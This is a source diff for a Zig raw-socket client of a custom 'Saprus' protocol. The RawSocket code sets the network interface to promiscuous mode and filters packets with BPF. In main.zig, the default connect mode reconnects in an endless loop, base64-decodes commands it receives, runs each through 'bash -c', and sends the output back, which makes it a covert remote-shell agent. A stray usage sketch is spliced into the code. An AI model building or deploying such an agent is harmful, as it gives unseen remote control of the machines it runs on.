if (ifr.ifru.flags.LOOPBACK) continue;
break ifr;
}
} else return error.NoInterfaceFound;
// 2. Get Interface Index
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFINDEX, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
const ifindex: i32 = ifr.ifru.ivalue;
// 3. Get Real MAC Address
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFHWADDR, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
var mac: [6]u8 = ifr.ifru.hwaddr.data[0..6].*;
if (builtin.cpu.arch.endian() == .little) std.mem.reverse(u8, &mac);
// 4. Set Flags (Promiscuous/Broadcast)
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFFLAGS, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
ifr.ifru.flags.BROADCAST = true;
ifr.ifru.flags.PROMISC = true;
if (std.os.linux.ioctl(socket, std.os.linux.SIOCSIFFLAGS, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
const sockaddr_ll = std.mem.zeroInit(std.posix.sockaddr.ll, .{
.family = std.posix.AF.PACKET,
.ifindex = ifindex,
.protocol = std.mem.nativeToBig(u16, @as(u16, std.os.linux.ETH.P.IP)),
});
const bind_ret = std.os.linux.bind(socket, @ptrCast(&sockaddr_ll), @sizeOf(@TypeOf(sockaddr_ll)));
if (bind_ret != 0) return error.BindError;
return .{
.fd = socket,
.sockaddr_ll = sockaddr_ll,
.mac = mac,
};
}
pub fn setTimeout(self: *RawSocket, sec: isize, usec: i64) !void {
const timeout: std.os.linux.timeval = .{ .sec = sec, .usec = usec };
const timeout_ret = std.os.linux.setsockopt(self.fd, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
if (timeout_ret != 0) return error.SetTimeoutError;
}
pub fn deinit(self: *RawSocket) void {
_ = std.os.linux.close(self.fd);
self.* = undefined;
}
pub fn send(self: RawSocket, payload: []const u8) !void {
const sent_bytes = std.os.linux.sendto(
self.fd,
payload.ptr,
payload.len,
0,
@ptrCast(&self.sockaddr_ll),
@sizeOf(@TypeOf(self.sockaddr_ll)),
);
_ = sent_bytes;
}
pub fn receive(self: RawSocket, buf: []u8) ![]u8 {
const len = std.os.linux.recvfrom(
self.fd,
buf.ptr,
buf.len,
0,
null,
null,
);
if (std.os.linux.errno(len) != .SUCCESS) {
return error.Timeout; // TODO: get the real error, assume timeout for now.
}
return buf[0..len];
}
pub fn attachSaprusPortFilter(self: RawSocket, port: u16) !void {
const BPF = std.os.linux.BPF;
// BPF instruction structure for classic BPF
const SockFilter = extern struct {
code: u16,
jt: u8,
jf: u8,
k: u32,
};
const SockFprog = extern struct {
len: u16,
filter: [*]const SockFilter,
};
// Build the filter program
const filter = [_]SockFilter{
// Load 2 bytes at offset 46 (absolute)
.{ .code = BPF.LD | BPF.H | BPF.ABS, .jt = 0, .jf = 0, .k = 46 },
// Jump if equal to port (skip 0 if true, skip 1 if false)
.{ .code = BPF.JMP | BPF.JEQ | BPF.K, .jt = 0, .jf = 1, .k = @as(u32, port) },
// Return 0xffff (pass)
.{ .code = BPF.RET | BPF.K, .jt = 0, .jf = 0, .k = 0xffff },
// Return 0x0 (fail)
.{ .code = BPF.RET | BPF.K, .jt = 0, .jf = 0, .k = 0x0 },
};
const fprog = SockFprog{
.len = filter.len,
.filter = &filter,
};
// Attach filter to socket using setsockopt
const rc = std.os.linux.setsockopt(
self.fd,
std.os.linux.SOL.SOCKET,
std.os.linux.SO.ATTACH_FILTER,
@ptrCast(&fprog),
@sizeOf(SockFprog),
);
if (rc != 0) {
return error.BpfAttachFailed;
}
}
const std = @import("std");
const builtin = @import("builtin");
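
A small usage sketch for the RawSocket API above (not part of the diff): each connection attempt opens a fresh socket, attaches the port filter, and receives with a timeout, rather than reusing a socket that already has a BPF filter attached (the issue noted in the "Fix reconnection" commit).

fn receiveFiltered(port: u16, buf: []u8) ![]u8 {
    var sock: RawSocket = try .init();
    defer sock.deinit();

    try sock.attachSaprusPortFilter(port);
    try sock.setTimeout(3, 0); // 3 second receive timeout
    return sock.receive(buf);
}

const RawSocket = @import("./RawSocket.zig");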

src/c_api.zig

@@ -1,56 +1,88 @@
// client
export fn zaprus_init() c_int {
SaprusClient.init() catch return 1;
return 0;
}
export fn zaprus_deinit() c_int {
SaprusClient.deinit();
return 0;
}
export fn zaprus_send_relay(payload: [*]const u8, len: usize, dest: [4]u8) c_int {
SaprusClient.sendRelay(payload[0..len], dest, allocator) catch return 1;
return 0;
}
export fn zaprus_send_initial_connection(payload: [*]const u8, len: usize, initial_port: u16) c_int {
SaprusClient.sendInitialConnection(payload[0..len], initial_port, allocator) catch return 1;
return 0;
}
export fn zaprus_connect(payload: [*]const u8, len: usize) ?*SaprusMessage {
return SaprusClient.connect(payload[0..len], allocator) catch null;
}
// message
/// ptr should be freed by the caller.
export fn zaprus_message_to_bytes(msg: SaprusMessage, ptr: *[*]u8, len: *usize) c_int {
const bytes = msg.toBytes(allocator) catch return 1;
ptr.* = bytes[0..].*;
len.* = bytes.len;
return 0;
}
/// Return value should be destroyed with zaprus_message_deinit.
export fn zaprus_message_from_bytes(bytes: [*]const u8, len: usize) ?*SaprusMessage {
return SaprusMessage.fromBytes(bytes[0..len], allocator) catch null;
}
export fn zaprus_message_deinit(msg: *SaprusMessage) void {
msg.deinit(allocator);
}
const std = @import("std");
const zaprus = @import("zaprus");
const zaprus = @import("./root.zig");
const SaprusClient = zaprus.Client;
const SaprusMessage = zaprus.Message;
// Opaque types for C API
const ZaprusClient = opaque {};
const ZaprusConnection = opaque {};
const allocator = std.heap.c_allocator;
const alloc = std.heap.c_allocator;
const io = std.Io.Threaded.global_single_threaded.io();
test {
std.testing.refAllDeclsRecursively(@This());
export fn zaprus_init_client() ?*ZaprusClient {
const client = alloc.create(zaprus.Client) catch return null;
client.* = zaprus.Client.init() catch {
alloc.destroy(client);
return null;
};
return @ptrCast(client);
}
export fn zaprus_deinit_client(client: ?*ZaprusClient) void {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
if (c) |zc| {
zc.deinit();
alloc.destroy(zc);
}
}
export fn zaprus_client_send_relay(
client: ?*ZaprusClient,
payload: [*c]const u8,
payload_len: usize,
dest: [*c]const u8,
) c_int {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
const zc = c orelse return 1;
zc.sendRelay(io, payload[0..payload_len], dest[0..4].*) catch return 1;
return 0;
}
export fn zaprus_connect(
client: ?*ZaprusClient,
payload: [*c]const u8,
payload_len: usize,
) ?*ZaprusConnection {
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
const zc = c orelse return null;
const connection = alloc.create(zaprus.Connection) catch return null;
connection.* = zc.connect(io, payload[0..payload_len]) catch {
alloc.destroy(connection);
return null;
};
return @ptrCast(connection);
}
export fn zaprus_deinit_connection(connection: ?*ZaprusConnection) void {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
if (c) |zc| {
alloc.destroy(zc);
}
}
export fn zaprus_connection_next(
connection: ?*ZaprusConnection,
out: [*c]u8,
capacity: usize,
out_len: *usize,
) c_int {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
const zc = c orelse return 1;
const result = zc.next(io, out[0..capacity]) catch return 1;
out_len.* = result.len;
return 0;
}
export fn zaprus_connection_send(
connection: ?*ZaprusConnection,
payload: [*c]const u8,
payload_len: usize,
) c_int {
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
const zc = c orelse return 1;
zc.send(io, payload[0..payload_len]) catch return 1;
return 0;
}

src/main.zig

@@ -1,81 +1,233 @@
const is_debug = builtin.mode == .Debug;
/// This creates a debug allocator that can only be referenced in debug mode.
/// You should check for is_debug around every reference to dba.
var dba: DebugAllocator =
if (is_debug)
DebugAllocator.init
else
@compileError("Should not use debug allocator in release mode");
pub fn main() !void {
defer if (is_debug) {
_ = dba.deinit();
};
const gpa = if (is_debug) dba.allocator() else std.heap.smp_allocator;
// CLI parsing adapted from the example here
// https://github.com/Hejsil/zig-clap/blob/e47028deaefc2fb396d3d9e9f7bd776ae0b2a43a/README.md#examples
// First we specify what parameters our program can take.
// We can use `parseParamsComptime` to parse a string into an array of `Param(Help)`.
const params = comptime clap.parseParamsComptime(
const help =
\\-h, --help Display this help and exit.
\\-r, --relay <str> A relay message to send.
\\-d, --dest <str> An IPv4 or <= 4 ASCII byte string.
\\-c, --connect <str> A connection message to send.
\\
);
;
// Initialize our diagnostics, which can be used for reporting useful errors.
// This is optional. You can also pass `.{}` to `clap.parse` if you don't
// care about the extra information `Diagnostics` provides.
var diag = clap.Diagnostic{};
var res = clap.parse(clap.Help, &params, clap.parsers.default, .{
.diagnostic = &diag,
.allocator = gpa,
}) catch |err| {
// Report useful error and exit.
diag.report(std.io.getStdErr().writer(), err) catch {};
return err;
};
defer res.deinit();
const Option = enum { help, relay, dest, connect };
const to_option: StaticStringMap(Option) = .initComptime(.{
.{ "-h", .help },
.{ "--help", .help },
.{ "-r", .relay },
.{ "--relay", .relay },
.{ "-d", .dest },
.{ "--dest", .dest },
.{ "-c", .connect },
.{ "--connect", .connect },
});
try SaprusClient.init();
defer SaprusClient.deinit();
pub fn main(init: std.process.Init) !void {
// CLI parsing adapted from the example here
// https://codeberg.org/ziglang/zig/pulls/30644
if (res.args.help != 0) {
return clap.help(std.io.getStdErr().writer(), clap.Help, &params, .{});
}
const args = try init.minimal.args.toSlice(init.arena.allocator());
if (res.args.relay) |r| {
const dest = parseDest(res.args.dest) catch .{ 70, 70, 70, 70 };
try SaprusClient.sendRelay(
if (r.len > 0) r else "Hello darkness my old friend",
dest,
gpa,
);
// std.debug.print("Sent: {s}\n", .{r});
return;
} else if (res.args.connect) |c| {
const conn_res: ?SaprusMessage = SaprusClient.connect(if (c.len > 0) c else "Hello darkness my old friend", gpa) catch |err| switch (err) {
error.WouldBlock => null,
else => return err,
};
defer if (conn_res) |r| r.deinit(gpa);
if (conn_res) |r| {
std.debug.print("{s}\n", .{r.connection.payload});
var flags: struct {
relay: ?[]const u8 = null,
dest: ?[]const u8 = null,
connect: ?[]const u8 = null,
} = .{};
if (args.len == 1) {
flags.connect = "";
} else {
std.debug.print("No response from connection request\n", .{});
var i: usize = 1;
while (i < args.len) : (i += 1) {
if (to_option.get(args[i])) |opt| {
switch (opt) {
.help => {
std.debug.print("{s}", .{help});
return;
},
.relay => {
i += 1;
if (i < args.len) {
flags.relay = args[i];
} else {
flags.relay = "";
}
},
.dest => {
i += 1;
if (i < args.len) {
flags.dest = args[i];
} else {
std.debug.print("-d/--dest requires a string\n", .{});
return error.InvalidArguments;
}
},
.connect => {
i += 1;
if (i < args.len) {
flags.connect = args[i];
} else {
flags.connect = "";
}
},
}
} else {
std.debug.print("Unknown argument: {s}\n", .{args[i]});
return error.InvalidArguments;
}
}
}
if (flags.connect != null and (flags.relay != null or flags.dest != null)) {
std.debug.print("Incompatible arguments.\nCannot use --connect/-c with dest or relay.\n", .{});
return error.InvalidArguments;
}
var client: SaprusClient = undefined;
if (flags.relay != null) {
client = try .init();
defer client.deinit();
var chunk_writer_buf: [2048]u8 = undefined;
var chunk_writer: Writer = .fixed(&chunk_writer_buf);
if (flags.relay.?.len > 0) {
var output_iter = std.mem.window(u8, flags.relay.?, SaprusClient.max_payload_len, SaprusClient.max_payload_len);
while (output_iter.next()) |chunk| {
chunk_writer.end = 0;
try chunk_writer.print("{b64}", .{chunk});
try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest));
try init.io.sleep(.fromMilliseconds(40), .boot);
}
} else {
var stdin_file: std.Io.File = .stdin();
var stdin_file_reader = stdin_file.reader(init.io, &.{});
var stdin_reader = &stdin_file_reader.interface;
var lim_buf: [SaprusClient.max_payload_len]u8 = undefined;
var limited = stdin_reader.limited(.limited(10 * lim_buf.len), &lim_buf);
var stdin = &limited.interface;
while (stdin.fillMore()) {
// Sometimes fillMore will return 0 bytes.
// Skip these
if (stdin.seek == stdin.end) continue;
chunk_writer.end = 0;
try chunk_writer.print("{b64}", .{stdin.buffered()});
try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest));
try init.io.sleep(.fromMilliseconds(40), .boot);
try stdin.discardAll(stdin.end);
} else |err| switch (err) {
error.EndOfStream => {
log.debug("end of stdin", .{});
},
else => |e| return e,
}
}
return;
}
return clap.help(std.io.getStdErr().writer(), clap.Help, &params, .{});
var init_con_buf: [SaprusClient.max_payload_len]u8 = undefined;
var w: Writer = .fixed(&init_con_buf);
try w.print("{b64}", .{flags.connect.?});
if (flags.connect != null) {
reconnect: while (true) {
client = try .init();
defer client.deinit();
log.debug("Starting connection", .{});
try client.socket.setTimeout(if (is_debug) 3 else 25, 0);
var connection = client.connect(init.io, w.buffered()) catch {
log.debug("Connection timed out", .{});
continue;
};
log.debug("Connection started", .{});
next_message: while (true) {
var res_buf: [2048]u8 = undefined;
try client.socket.setTimeout(if (is_debug) 60 else 600, 0);
const next = connection.next(init.io, &res_buf) catch {
continue :reconnect;
};
const b64d = std.base64.standard.Decoder;
var connection_payload_buf: [2048]u8 = undefined;
const connection_payload = connection_payload_buf[0..try b64d.calcSizeForSlice(next)];
b64d.decode(connection_payload, next) catch {
log.debug("Failed to decode message, skipping: '{s}'", .{connection_payload});
continue;
};
var child = std.process.spawn(init.io, .{
.argv = &.{ "bash", "-c", connection_payload },
.stdout = .pipe,
.stderr = .ignore,
.stdin = .ignore,
}) catch continue;
var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined;
var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf);
var is_killed: std.atomic.Value(bool) = .init(false);
var kill_task = try init.io.concurrent(killProcessAfter, .{ init.io, &child, .fromSeconds(3), &is_killed });
defer _ = kill_task.cancel(init.io) catch {};
var cmd_output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
var cmd_output: Writer = .fixed(&cmd_output_buf);
// Maximum of 10 messages of output per command
for (0..10) |_| {
cmd_output.end = 0;
child_output_reader.interface.fill(child_output_reader.interface.buffer.len) catch |err| switch (err) {
error.ReadFailed => continue :next_message, // TODO: check if there is a better way to handle this
error.EndOfStream => {
cmd_output.print("{b64}", .{child_output_reader.interface.buffered()}) catch unreachable;
if (cmd_output.end > 0) {
connection.send(init.io, cmd_output.buffered()) catch |e| {
log.debug("Failed to send connection chunk: {t}", .{e});
continue :next_message;
};
}
break;
},
};
cmd_output.print("{b64}", .{try child_output_reader.interface.takeArray(child_output_buf.len)}) catch unreachable;
connection.send(init.io, cmd_output.buffered()) catch |err| {
log.debug("Failed to send connection chunk: {t}", .{err});
continue :next_message;
};
try init.io.sleep(.fromMilliseconds(40), .boot);
} else {
kill_task.cancel(init.io) catch {};
killProcessAfter(init.io, &child, .zero, &is_killed) catch |err| {
log.debug("Failed to kill process??? {t}", .{err});
continue :next_message;
};
}
fn parseDest(in: ?[]const u8) ![4]u8 {
if (!is_killed.load(.monotonic)) {
_ = child.wait(init.io) catch |err| {
log.debug("Failed to wait for child: {t}", .{err});
};
}
}
}
}
unreachable;
}
fn killProcessAfter(io: std.Io, proc: *std.process.Child, duration: std.Io.Duration, is_killed: *std.atomic.Value(bool)) !void {
io.sleep(duration, .boot) catch |err| switch (err) {
error.Canceled => return,
else => |e| return e,
};
is_killed.store(true, .monotonic);
proc.kill(io);
}
fn parseDest(in: ?[]const u8) [4]u8 {
if (in) |dest| {
if (dest.len <= 4) {
var res: [4]u8 = @splat(0);
@@ -83,19 +235,20 @@ fn parseDest(in: ?[]const u8) ![4]u8 {
return res;
}
const addr = try std.net.Ip4Address.parse(dest, 0);
return @bitCast(addr.sa.addr);
const addr = std.Io.net.Ip4Address.parse(dest, 0) catch return "FAIL".*;
return addr.bytes;
}
return .{ 70, 70, 70, 70 };
return "disc".*;
}
const builtin = @import("builtin");
const std = @import("std");
const DebugAllocator = std.heap.DebugAllocator(.{});
const log = std.log;
const ArrayList = std.ArrayList;
const StaticStringMap = std.StaticStringMap;
const zaprus = @import("zaprus");
const SaprusClient = zaprus.Client;
const SaprusMessage = zaprus.Message;
const clap = @import("clap");
const Writer = std.Io.Writer;

src/message.zig

@@ -1,18 +1,164 @@
const base64Enc = std.base64.Base64Encoder.init(std.base64.standard_alphabet_chars, '=');
const base64Dec = std.base64.Base64Decoder.init(std.base64.standard_alphabet_chars, '=');
/// Type tag for Message union.
/// This is the first value in the actual packet sent over the network.
pub const PacketType = enum(u16) {
relay = 0x003C,
file_transfer = 0x8888,
connection = 0x00E9,
_,
pub const MessageTypeError = error{
NotImplementedSaprusType,
UnknownSaprusType,
};
pub const MessageParseError = MessageTypeError || error{
InvalidMessage,
};
const message = @This();
pub const Message = union(enum(u16)) {
relay: Message.Relay = 0x003C,
connection: Message.Connection = 0x00E9,
_,
pub const Relay = message.Relay;
pub const Connection = message.Connection;
pub fn toBytes(self: message.Message, buf: []u8) []u8 {
return switch (self) {
inline .relay, .connection => |m| m.toBytes(buf),
else => unreachable,
};
}
pub const parse = message.parse;
};
pub const relay_dest_len = 4;
pub fn parse(bytes: []const u8) MessageParseError!Message {
var in: Reader = .fixed(bytes);
const @"type" = in.takeEnum(std.meta.Tag(Message), .big) catch |err| switch (err) {
error.InvalidEnumTag => return error.UnknownSaprusType,
else => return error.InvalidMessage,
};
const checksum = in.takeArray(2) catch return error.InvalidMessage;
switch (@"type") {
.relay => {
const dest: Relay.Dest = .fromBytes(
in.takeArray(relay_dest_len) catch return error.InvalidMessage,
);
const payload = in.buffered();
return .{
.relay = .{
.dest = dest,
.checksum = checksum.*,
.payload = payload,
},
};
},
.connection => {
const src = in.takeInt(u16, .big) catch return error.InvalidMessage;
const dest = in.takeInt(u16, .big) catch return error.InvalidMessage;
const seq = in.takeInt(u32, .big) catch return error.InvalidMessage;
const id = in.takeInt(u32, .big) catch return error.InvalidMessage;
const reserved = in.takeByte() catch return error.InvalidMessage;
const options = in.takeStruct(Connection.Options, .big) catch return error.InvalidMessage;
const payload = in.buffered();
return .{
.connection = .{
.src = src,
.dest = dest,
.seq = seq,
.id = id,
.reserved = reserved,
.options = options,
.payload = payload,
},
};
},
else => return error.NotImplementedSaprusType,
}
}
test parse {
_ = try parse(&[_]u8{ 0x00, 0x3c, 0x00, 0x17, 0xac, 0x12, 0x01, 0x1e, 0x72, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65, 0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64 });
{
const expected: Message = .{
.connection = .{
.src = 12416,
.dest = 61680,
.seq = 0,
.id = 0,
.reserved = 0,
.options = @bitCast(@as(u8, 100)),
.payload = &[_]u8{ 0x69, 0x61, 0x6d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74 },
},
};
const actual = try parse(&[_]u8{ 0x00, 0xe9, 0x00, 0x18, 0x30, 0x80, 0xf0, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x69, 0x61, 0x6d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74 });
try std.testing.expectEqualDeep(expected, actual);
}
}
const Relay = struct {
dest: Dest,
checksum: [2]u8 = undefined,
payload: []const u8,
pub const Dest = struct {
bytes: [relay_dest_len]u8,
/// Asserts bytes is less than or equal to 4 bytes
pub fn fromBytes(bytes: []const u8) Dest {
var buf: [4]u8 = @splat(0);
std.debug.assert(bytes.len <= buf.len);
@memcpy(buf[0..bytes.len], bytes);
return .{ .bytes = buf };
}
};
pub fn init(dest: Dest, payload: []const u8) Relay {
return .{ .dest = dest, .payload = payload };
}
/// Asserts that buf is large enough to fit the relay message.
pub fn toBytes(self: Relay, buf: []u8) []u8 {
var out: Writer = .fixed(buf);
out.writeInt(u16, @intFromEnum(Message.relay), .big) catch unreachable;
out.writeInt(u16, @intCast(self.payload.len + 4), .big) catch unreachable; // Length field, but unread. Will switch to checksum
out.writeAll(&self.dest.bytes) catch unreachable;
out.writeAll(self.payload) catch unreachable;
return out.buffered();
}
test toBytes {
var buf: [1024]u8 = undefined;
const relay: Relay = .init(
.fromBytes(&.{ 172, 18, 1, 30 }),
// zig fmt: off
&[_]u8{
0x72, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65,
0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64
},
// zig fmt: on
);
// zig fmt: off
var expected = [_]u8{
0x00, 0x3c, 0x00, 0x17, 0xac, 0x12, 0x01, 0x1e, 0x72,
0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65,
0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64
};
// zig fmt: on
try expectEqualMessageBuffers(&expected, relay.toBytes(&buf));
}
};
const Connection = struct {
src: u16,
dest: u16,
seq: u32,
id: u32,
reserved: u8 = undefined,
options: Options = undefined,
payload: []const u8,
/// Reserved option values.
/// Currently unused.
pub const ConnectionOptions = packed struct(u8) {
pub const Options = packed struct(u8) {
opt1: bool = false,
opt2: bool = false,
opt3: bool = false,
@@ -23,189 +169,43 @@ pub const ConnectionOptions = packed struct(u8) {
opt8: bool = false,
};
pub const Error = error{
NotImplementedSaprusType,
UnknownSaprusType,
};
/// All Saprus messages
pub const Message = union(PacketType) {
pub const Relay = struct {
pub const Header = packed struct {
dest: @Vector(4, u8),
};
header: Header,
payload: []const u8,
};
pub const Connection = struct {
pub const Header = packed struct {
src_port: u16, // random number > 1024
dest_port: u16, // random number > 1024
seq_num: u32 = 0,
msg_id: u32 = 0,
reserved: u8 = 0,
options: ConnectionOptions = .{},
};
header: Header,
payload: []const u8,
};
relay: Relay,
file_transfer: void, // unimplemented
connection: Connection,
/// Should be called for any Message that was declared using a function that you pass an allocator to.
pub fn deinit(self: Message, allocator: Allocator) void {
switch (self) {
.relay => |r| allocator.free(r.payload),
.connection => |c| allocator.free(c.payload),
else => unreachable,
}
}
fn toBytesAux(
header: anytype,
payload: []const u8,
buf: *std.ArrayList(u8),
allocator: Allocator,
) !void {
const Header = @TypeOf(header);
// Create a growable string to store the base64 bytes in.
// Doing this first so I can use the length of the encoded bytes for the length field.
var payload_list = std.ArrayList(u8).init(allocator);
defer payload_list.deinit();
const buf_w = payload_list.writer();
// Write the payload bytes as base64 to the growable string.
try base64Enc.encodeWriter(buf_w, payload);
// At this point, payload_list contains the base64 encoded payload.
// Add the payload length to the output buf.
try buf.*.appendSlice(
asBytes(&nativeToBig(u16, @intCast(payload_list.items.len + @bitSizeOf(Header) / 8))),
);
// Add the header bytes to the output buf.
var header_buf: [@sizeOf(Header)]u8 = undefined;
var header_buf_stream = std.io.fixedBufferStream(&header_buf);
try header_buf_stream.writer().writeStructEndian(header, .big);
// Add the exact number of bits in the header without padding.
try buf.*.appendSlice(header_buf[0 .. @bitSizeOf(Header) / 8]);
try buf.*.appendSlice(payload_list.items);
}
/// Caller is responsible for freeing the returned bytes.
pub fn toBytes(self: Message, allocator: Allocator) ![]u8 {
// Create a growable list of bytes to store the output in.
var buf = std.ArrayList(u8).init(allocator);
errdefer buf.deinit();
// Start with writing the message type, which is the first 16 bits of every Saprus message.
try buf.appendSlice(asBytes(&nativeToBig(u16, @intFromEnum(self))));
// Write the proper header and payload for the given packet type.
switch (self) {
.relay => |r| try toBytesAux(r.header, r.payload, &buf, allocator),
.connection => |c| try toBytesAux(c.header, c.payload, &buf, allocator),
.file_transfer => return Error.NotImplementedSaprusType,
}
// Collect the growable list as a slice and return it.
return buf.toOwnedSlice();
}
fn fromBytesAux(
comptime packet: PacketType,
len: u16,
r: std.io.FixedBufferStream([]const u8).Reader,
allocator: Allocator,
) !Message {
const Header = @field(@FieldType(Message, @tagName(packet)), "Header");
// Read the header for the current message type.
var header_bytes: [@sizeOf(Header)]u8 = undefined;
_ = try r.read(header_bytes[0 .. @bitSizeOf(Header) / 8]);
var header_stream = std.io.fixedBufferStream(&header_bytes);
const header = try header_stream.reader().readStructEndian(Header, .big);
// Read the base64 bytes into a list to be able to call the decoder on it.
const payload_buf = try allocator.alloc(u8, len - @bitSizeOf(Header) / 8);
defer allocator.free(payload_buf);
_ = try r.readAll(payload_buf);
// Create a buffer to store the payload in, and decode the base64 bytes into the payload field.
const payload = try allocator.alloc(u8, try base64Dec.calcSizeForSlice(payload_buf));
try base64Dec.decode(payload, payload_buf);
// Return the type of Message specified by the `packet` argument.
return @unionInit(Message, @tagName(packet), .{
.header = header,
.payload = payload,
});
}
/// Caller is responsible for calling .deinit on the returned value.
pub fn fromBytes(bytes: []const u8, allocator: Allocator) !Message {
var s = std.io.fixedBufferStream(bytes);
const r = s.reader();
// Read packet type
const packet_type = @as(PacketType, @enumFromInt(try r.readInt(u16, .big)));
// Read the length of the header + base64 encoded payload.
const len = try r.readInt(u16, .big);
switch (packet_type) {
.relay => return fromBytesAux(.relay, len, r, allocator),
.connection => return fromBytesAux(.connection, len, r, allocator),
.file_transfer => return Error.NotImplementedSaprusType,
else => return Error.UnknownSaprusType,
}
/// Asserts that buf is large enough to fit the connection message.
pub fn toBytes(self: Connection, buf: []u8) []u8 {
var out: Writer = .fixed(buf);
out.writeInt(u16, @intFromEnum(Message.connection), .big) catch unreachable;
out.writeInt(u16, @intCast(self.payload.len + 14), .big) catch unreachable; // Saprus length field, unread.
out.writeInt(u16, self.src, .big) catch unreachable;
out.writeInt(u16, self.dest, .big) catch unreachable;
out.writeInt(u32, self.seq, .big) catch unreachable;
out.writeInt(u32, self.id, .big) catch unreachable;
out.writeByte(self.reserved) catch unreachable;
out.writeStruct(self.options, .big) catch unreachable;
out.writeAll(self.payload) catch unreachable;
return out.buffered();
}
};
test "Round trip" {
{
const expected = [_]u8{ 0x0, 0xe9, 0x0, 0x15, 0x30, 0x80, 0xf0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x64, 0x36, 0x3a, 0x3a, 0x64, 0x61, 0x74, 0x61 };
const msg = (try parse(&expected)).connection;
var res_buf: [expected.len + 1]u8 = undefined; // + 1 to test subslice result.
const res = msg.toBytes(&res_buf);
try expectEqualMessageBuffers(&expected, res);
}
}
// Skip checking the length / checksum, because that is undefined.
fn expectEqualMessageBuffers(expected: []const u8, actual: []const u8) !void {
try std.testing.expectEqualSlices(u8, expected[0..2], actual[0..2]);
try std.testing.expectEqualSlices(u8, expected[4..], actual[4..]);
}
const std = @import("std");
const Allocator = std.mem.Allocator;
const Writer = std.Io.Writer;
const Reader = std.Io.Reader;
const asBytes = std.mem.asBytes;
const nativeToBig = std.mem.nativeToBig;
test "Round trip Relay toBytes and fromBytes" {
const gpa = std.testing.allocator;
const msg = Message{
.relay = .{
.header = .{ .dest = .{ 255, 255, 255, 255 } },
.payload = "Hello darkness my old friend",
},
};
const to_bytes = try msg.toBytes(gpa);
defer gpa.free(to_bytes);
const from_bytes = try Message.fromBytes(to_bytes, gpa);
defer from_bytes.deinit(gpa);
try std.testing.expectEqualDeep(msg, from_bytes);
}
test "Round trip Connection toBytes and fromBytes" {
const gpa = std.testing.allocator;
const msg = Message{
.connection = .{
.header = .{
.src_port = 0,
.dest_port = 0,
},
.payload = "Hello darkness my old friend",
},
};
const to_bytes = try msg.toBytes(gpa);
defer gpa.free(to_bytes);
const from_bytes = try Message.fromBytes(to_bytes, gpa);
defer from_bytes.deinit(gpa);
try std.testing.expectEqualDeep(msg, from_bytes);
test {
std.testing.refAllDeclsRecursive(@This());
}

src/root.zig

@@ -1,4 +1,13 @@
pub const Client = @import("Client.zig");
pub usingnamespace @import("message.zig");
pub const Connection = @import("Connection.zig");
pub usingnamespace @import("c_api.zig");
const msg = @import("message.zig");
pub const PacketType = msg.PacketType;
pub const MessageTypeError = msg.MessageTypeError;
pub const MessageParseError = msg.MessageParseError;
pub const Message = msg.Message;
test {
@import("std").testing.refAllDecls(@This());
}